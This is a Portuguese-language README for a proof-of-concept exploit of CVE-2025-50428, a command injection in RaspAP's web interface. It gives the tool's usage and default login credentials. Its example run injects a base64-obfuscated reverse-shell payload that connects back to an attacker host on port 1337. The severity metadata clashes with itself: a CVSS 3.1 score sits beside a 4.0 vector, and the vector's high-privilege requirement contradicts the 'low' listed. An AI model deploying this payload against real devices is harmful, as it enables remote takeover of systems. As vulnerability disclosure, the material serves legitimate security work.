
Prova de conceito para a vulnerabilidade CVE-2025-50428: Injeção autenticada de comandos do sistema operacional no RaspAP
Um exploit de prova de conceito para CVE-2025-50428, uma vulnerabilidade de injeção de comandos no RaspAP raspap-webgui 3.2.9 e versões anteriores.
| ID da Vulnerabilidade | CVE-2025-50428 |
|---|---|
| Severidade | Alta (CVSS 3.1: 8.6) |
| Vetor CVSS | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Tipo de Vulnerabilidade | Injeção de Código |
| Vetor de Ataque | Remoto (Autenticado) |
| Privilégios Necessários | Baixo |
| Impacto | Execução de Código, Escalonamento de Privilégios |
| Produto Afetado | raspap-webgui ≤ 3.2.9 |
| Descoberto por | SmartTECS Cyber Security GmbH |
Este exploit tem como alvo uma vulnerabilidade de injeção de comandos no script hostapd.php do RaspAP. A vulnerabilidade existe devido à sanitização inadequada da entrada do usuário passada por meio do parâmetro interface. Um atacante autenticado pode injetar comandos arbitrários do sistema operacional, resultando na execução de código com os privilégios do usuário www-data.
requests instaladapython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: URL base da instalação do RaspAP (ex.: http://192.168.122.22)--interface: Valor para o parâmetro interface, payload de injeção permitido--username: Nome de usuário do RaspAP (padrão: admin)--password: Senha do RaspAP (padrão: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH é uma empresa de cibersegurança especializada em testes de penetração, desenvolvimento seguro de software e pesquisa de vulnerabilidades. A empresa oferece avaliações de segurança personalizadas, resposta a incidentes e serviços de consultoria estratégica para ajudar organizações a proteger sistemas críticos contra ameaças cibernéticas em constante evolução.
Esta ferramenta é fornecida estritamente para fins educacionais e de pesquisa. Use apenas em sistemas de sua propriedade ou administrados com permissão explícita. O autor e a SmartTECS Cyber Security GmbH não se responsabilizam por uso indevido ou danos.